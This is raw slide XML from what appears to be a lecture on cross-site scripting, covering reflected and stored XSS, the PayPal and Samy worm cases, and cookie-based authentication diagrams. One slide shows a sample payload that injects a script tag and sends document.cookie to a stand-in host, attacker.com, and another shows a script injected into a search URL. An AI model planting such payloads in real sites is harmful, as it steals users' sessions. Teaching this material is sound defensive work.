            <a:off x="1182398" y="4184205"/>
            <a:ext cx="22019204" cy="5939627"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="63500">
            <a:solidFill>
              <a:srgbClr val="5E5E5E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 algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Search Results&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>  &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>    &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;Results for </a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:hueOff val="-82419"/>
                  <a:satOff val="-9513"/>
                  <a:lumOff val="-16343"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a: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rPr>
              <a:t>        window.open(“http:///attacker.com?”+cookie=document.cookie)</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:hueOff val="-82419"/>
                  <a:satOff val="-9513"/>
                  <a:lumOff val="-16343"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a: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rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"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rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="accent5">
                  <a:hueOff val="-82419"/>
                  <a:satOff val="-9513"/>
                  <a:lumOff val="-16343"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a: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rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>h1</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>  &lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>body</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr b="0" sz="3700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>html</a:t>
            </a:r>
            <a:r>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="350" name="https://google.com/search?q=&lt;script&gt;…&lt;/script&gt;"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12145974" y="3567581"/>
            <a:ext cx="9579882" cy="508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2700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>https://google.com/search?q=</a:t>
            </a:r>
            <a:r>
              <a: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rPr>
              <a:t>&lt;script&gt;…&lt;/script&gt;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Types of XS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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Types of XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="355" name="An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="8257688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4752"/>
            </a:pPr>
            <a:r>
              <a:t>An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2970"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="4752"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1"/>
              <a:t>Two Types:</a:t>
            </a:r>
            <a:br/>
            <a:endParaRPr sz="2970"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4752"/>
            </a:pPr>
            <a:r>
              <a:t>Reflected XSS.</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>The attack script is reflected back to the user as part of a page from the victim site.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr sz="2970"/>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="817244">
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
              <a:defRPr b="1" sz="4752"/>
            </a:pPr>
            <a:r>
              <a:t>Stored XSS.</a:t>
            </a:r>
            <a:r>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0"/>
              <a:t>The attacker stores the malicious code in a resource managed by the web application, such as a database.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Reflected Exampl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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Reflected Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Attackers contacted PayPal users via email and fooled them into accessing a URL hosted on the legitimate PayPal website.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="6877606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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Attackers contacted PayPal users via email and fooled them into accessing a URL hosted on the legitimate PayPal website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Injected code redirected PayPal visitors to a page warning users their accounts had been compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>Victims were then redirected to a phishing site and prompted to enter sensitive financial data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="361" name="Paypal-Logo-2015.png" descr="Paypal-Logo-2015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5709878" y="10599815"/>
            <a:ext cx="7714655" cy="219867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Stored XS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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="366" name="The attacker stores the malicious code in a resource managed by the web application, such as a database."/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="2286001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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>The attacker stores the malicious code in a resource managed by the web application, such as a database.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="367" name="PhpBB Post a reply.jpg" descr="PhpBB Post a reply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219053" y="6117128"/>
            <a:ext cx="17945795" cy="1383249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Samy Worm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>
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Samy Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="372" name="XSS-based worm that spread on MySpace. It would display the string &quot;but most of all, samy is my hero&quot; on a victim's MySpace profile page as well as send Samy a friend request.…"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="3513508"/>
            <a:ext cx="21005800" cy="4744145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4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>XSS-based worm that spread on MySpace. It would display the string "</a:t>
            </a:r>
            <a:r>
              <a:rPr i="1"/>
              <a:t>but most of all, samy is my hero</a:t>
            </a:r>
            <a:r>
              <a:t>" on a victim's MySpace profile page as well as send Samy a friend request. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="4100"/>
              </a:spcBef>
              <a:buSzTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t>In 20 hours, it spread to one million users.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Cookie-Based Authentication"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1689100" y="345634"/>
            <a:ext cx="21005800" cy="2286001"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="1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/>
            <a:r>
              <a:t>Cookie-Based Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720850" y="2922333"/>
            <a:ext cx="20942300" cy="3024001"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent4">
                <a:hueOff val="-1081314"/>
                <a:satOff val="4338"/>
                <a:lumOff val="-8931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0" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11837279" y="4142958"/>
            <a:ext cx="6536907" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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151" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140541" y="3304033"/>
            <a:ext cx="9136119" cy="2260601"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8688"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="25400" dir="3600000">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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152" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178592" y="3327093"/>
            <a:ext cx="9060018" cy="10305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lnTo>
                  <a:pt x="0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117"/>
                </a:cubicBez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DCDEE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b="0" sz="39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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="156" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2325175" y="3757737"/>
            <a:ext cx="851441" cy="165759"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851439" cy="165757"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="153" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="681174" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="154" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="340587" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D32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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="155" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="C82506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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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</p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157" name="Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3449884" y="3582534"/>
            <a:ext cx="7448787" cy="516165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b="0" sz="40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pic>
        <p:nvPicPr>
          <p:cNvPr id="158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433529" y="3672642"/>
            <a:ext cx="382141" cy="335948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="159" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="13962448" y="5035362"/>
            <a:ext cx="4572739" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="101600">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:prstDash val="sysDot"/>
            <a:miter lim="400000"/>
            <a:headEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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pic>
        <p:nvPicPr>
          <p:cNvPr id="160" name="web_server.tiff" descr="web_server.tiff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20277574" y="3255452"/>
            <a:ext cx="1059222" cy="1267013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="GET /account"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11873080" y="3519972"/>
            <a:ext cx="2857948" cy="5904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lnSpc>
                <a:spcPts val="5000"/>
              </a:lnSpc>
              <a:defRPr b="0">
                <a:latin typeface="Monaco"/>
                <a:ea typeface="Monaco"/>
                <a:cs typeface="Monaco"/>
                <a:sym typeface="Monaco"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>GET /account</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="162" name="api.bank.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19522833" y="4890347"/>
            <a:ext cx="2568703" cy="5604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api.bank.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="163" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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6498848" y="3510134"/>
            <a:ext cx="516165" cy="516164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="attacker.com"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3453324" y="3560392"/>
            <a:ext cx="2491741" cy="5604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attacker.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165" name="$.ajax({url: “api.bank.com/account“, …})"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2505495" y="4614452"/>
            <a:ext cx="8345241" cy="508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defRPr b="0" sz="2700">
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>$.</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1"/>
              <a:t>ajax</a:t>
            </a:r>
            <a:r>
              <a:t>({url: “api.bank.com/account“, …})</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="166" name="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png" descr="0484184d72076b38f8b68869d565ab1b-chocolate-chip-cookie-icon-by-vexels.png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7081261" y="3510134"/>
            <a:ext cx="516164" cy="516164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="167" name="51xnaPe5YuL._SL1000_.jpg" descr="51xnaPe5YuL._SL1000_.jpg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12421631" y="4445167"/>
            <a:ext cx="1180391" cy="1180390"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1720850" y="6438067"/>
            <a:ext cx="20942300" cy="3024001"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 4935"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="accent5">
                <a:hueOff val="-82419"/>
                <a:satOff val="-9513"/>
                <a:lumOff val="-16343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69" name="Line"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11837279" y="7658692"/>
            <a:ext cx="6536907" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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170" name="Rounded Rectangle"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2140541" y="6819766"/>
            <a:ext cx="9136119" cy="2260601"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 8688"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solidFill>
          <a:ln w="25400">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="400000"/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw sx="100000" sy="100000" kx="0" ky="0" algn="b" rotWithShape="0" blurRad="50800" dist="25400" dir="3600000">
              <a:srgbClr val="000000">
                <a:alpha val="70000"/>
              </a:srgbClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="50800" tIns="50800" rIns="50800" bIns="50800" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="584200">
              <a:defRPr b="0" sz="40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sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Shape"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2178592" y="6842827"/>
            <a:ext cx="9060018" cy="10305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lnTo>
                  <a:pt x="0" y="4117"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2980"/>
                  <a:pt x="52" y="1951"/>
                  <a:pt x="136" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="461"/>
                  <a:pt x="336" y="0"/>
                  <a:pt x="464" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21136" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21264" y="0"/>
                  <a:pt x="21380" y="461"/>
                  <a:pt x="21464" y="1206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21548" y="1951"/>
                  <a:pt x="21600" y="2980"/>
                  <a:pt x="21600" y="4117"/>
                </a:cubicBez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DCDEE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b="0" sz="39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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="175" name="Group"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2325175" y="7273471"/>
            <a:ext cx="851441" cy="165758"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="851439" cy="165757"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="172" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="681174" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="00882B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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="173" name="Circle"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="340587" y="0"/>
              <a:ext cx="170266" cy="165758"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="F5D328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b="0" sz="4000">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill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  <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="174" name="Circle"/>
